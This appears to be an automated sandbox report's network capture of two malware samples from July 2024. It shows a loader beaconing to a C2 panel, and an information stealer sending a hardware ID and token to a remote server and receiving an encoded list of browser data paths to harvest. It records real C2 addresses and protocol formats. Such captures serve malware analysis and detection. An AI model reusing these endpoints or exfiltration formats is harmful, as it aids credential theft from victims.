Jul 26, 2024 12:57:59.500127077 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:58:00.299496889 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:58:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:58:00.300302982 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 12:58:00.555473089 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:58:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.6	60851	185.215.113.16	80	6432	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:58:00.668941021 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:58:01.433845997 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:58:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:58:01.434550047 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 12:58:01.692897081 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:58:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.6	60852	77.91.101.71	80	2260	C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:58:01.304225922 CEST	329	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JECBGCFHCFIDHIDHDGDG User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: arpdabl.zapto.org Content-Length: 2681 Connection: Keep-Alive Cache-Control: no-cache
Jul 26, 2024 12:58:01.304266930 CEST	2681	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 45 43 42 47 43 46 48 43 46 49 44 48 49 44 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 65 65 39 34 62 Data Ascii: ------JECBGCFHCFIDHIDHDGDGContent-Disposition: form-data; name="token"0ee94bbc2c83b6f6386d1d0afce12d6c------JECBGCFHCFIDHIDHDGDGContent-Disposition: form-data; name="build_id"e0c99e9ff0b95355e8ec19c548ab0f83------JECBGCFHCFIDHI
Jul 26, 2024 12:58:02.137490034 CEST	161	IN	HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Fri, 26 Jul 2024 10:58:02 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.6	60853	185.215.113.16	80	6432	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:58:01.811126947 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:58:02.558667898 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:58:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:58:02.567167997 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 12:58:02.813520908 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:58:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.6	60855	185.215.113.16	80	6432	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:58:02.939697027 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:58:03.732790947 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:58:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:58:03.801405907 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 12:58:04.055325985 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:58:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.6	60856	185.215.113.16	80	6432	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:58:04.264380932 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:58:05.045819044 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:58:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.6	60858	185.215.113.16	80	6432	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:58:05.067219019 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 12:58:05.832185984 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:58:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.6	60860	185.215.113.16	80	6432	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:58:05.952389002 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:58:06.754901886 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:58:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	60783	23.192.247.89	443	2260	C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 10:57:12 UTC	119	OUT	GET /profiles/76561199747278259 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache
2024-07-26 10:57:12 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Fri, 26 Jul 2024 10:57:12 GMT Content-Length: 34725 Connection: close Set-Cookie: sessionid=d8689d73cb4fb2c92846da18; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-07-26 10:57:12 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-07-26 10:57:12 UTC	10062	IN	Data Raw: 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e Data Ascii: enDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="n
2024-07-26 10:57:12 UTC	10149	IN	Data Raw: 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 4d 4d 55 4e 49 54 59 5f 43 44 4e 5f 41 53 53 45 54 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 61 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 61 73 73 65 74 73 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 53 54 4f 52 45 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 6f 72 65 2e 61 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 50 55 42 4c 49 43 5f 53 48 41 52 45 44 5f 55 52 4c 26 71 75 6f Data Ascii: kamai.steamstatic.com\/","COMMUNITY_CDN_ASSET_URL":"https:\/\/cdn.akamai.steamstatic.com\/steamcommunity\/public\/assets\/","STORE_CDN_URL":"https:\/\/store.akamai.steamstatic.com\/","PUBLIC_SHARED_URL&quo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	60785	5.75.212.60	443	2260	C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 10:57:14 UTC	230	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Connection: Keep-Alive Cache-Control: no-cache
2024-07-26 10:57:14 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Jul 2024 10:57:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-07-26 10:57:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	60787	5.75.212.60	443	2260	C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 10:57:15 UTC	322	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGDHDAFIDGDBGCAAFIDH User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Content-Length: 279 Connection: Keep-Alive Cache-Control: no-cache
2024-07-26 10:57:15 UTC	279	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 47 44 48 44 41 46 49 44 47 44 42 47 43 41 41 46 49 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 33 44 36 39 44 38 41 32 44 39 44 31 35 32 34 37 35 30 30 33 37 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 2d 31 31 65 65 2d 38 63 31 38 2d 38 30 36 65 36 66 36 65 36 39 36 33 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 48 44 41 46 49 44 47 44 42 47 43 41 41 46 49 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 30 63 39 39 65 39 66 66 30 62 39 35 33 35 35 65 38 65 63 31 39 63 35 34 38 61 62 30 66 38 33 0d 0a 2d 2d 2d 2d 2d 2d Data Ascii: ------BGDHDAFIDGDBGCAAFIDHContent-Disposition: form-data; name="hwid"73D69D8A2D9D1524750037-a33c7340-61ca-11ee-8c18-806e6f6e6963------BGDHDAFIDGDBGCAAFIDHContent-Disposition: form-data; name="build_id"e0c99e9ff0b95355e8ec19c548ab0f83------
2024-07-26 10:57:15 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Jul 2024 10:57:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-07-26 10:57:15 UTC	69	IN	Data Raw: 33 61 0d 0a 31 7c 30 7c 31 7c 30 7c 30 65 65 39 34 62 62 63 32 63 38 33 62 36 66 36 33 38 36 64 31 64 30 61 66 63 65 31 32 64 36 63 7c 31 7c 30 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 30 0d 0a 30 0d 0a 0d 0a Data Ascii: 3a1\|0\|1\|0\|0ee94bbc2c83b6f6386d1d0afce12d6c\|1\|0\|1\|0\|0\|50000\|00

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	60789	5.75.212.60	443	2260	C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 10:57:16 UTC	322	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HDGDGHCAAKECFHJKFIJK User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-07-26 10:57:16 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 44 47 44 47 48 43 41 41 4b 45 43 46 48 4a 4b 46 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 65 65 39 34 62 62 63 32 63 38 33 62 36 66 36 33 38 36 64 31 64 30 61 66 63 65 31 32 64 36 63 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 44 47 48 43 41 41 4b 45 43 46 48 4a 4b 46 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 30 63 39 39 65 39 66 66 30 62 39 35 33 35 35 65 38 65 63 31 39 63 35 34 38 61 62 30 66 38 33 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 44 47 48 43 41 41 4b 45 43 46 48 4a 4b 46 49 4a 4b 0d 0a 43 6f 6e 74 Data Ascii: ------HDGDGHCAAKECFHJKFIJKContent-Disposition: form-data; name="token"0ee94bbc2c83b6f6386d1d0afce12d6c------HDGDGHCAAKECFHJKFIJKContent-Disposition: form-data; name="build_id"e0c99e9ff0b95355e8ec19c548ab0f83------HDGDGHCAAKECFHJKFIJKCont
2024-07-26 10:57:17 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Jul 2024 10:57:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-07-26 10:57:17 UTC	1564	IN	Data Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45 Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	60791	5.75.212.60	443	2260	C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 10:57:17 UTC	322	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAKFCGIJKJKFHIDHIIIE User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
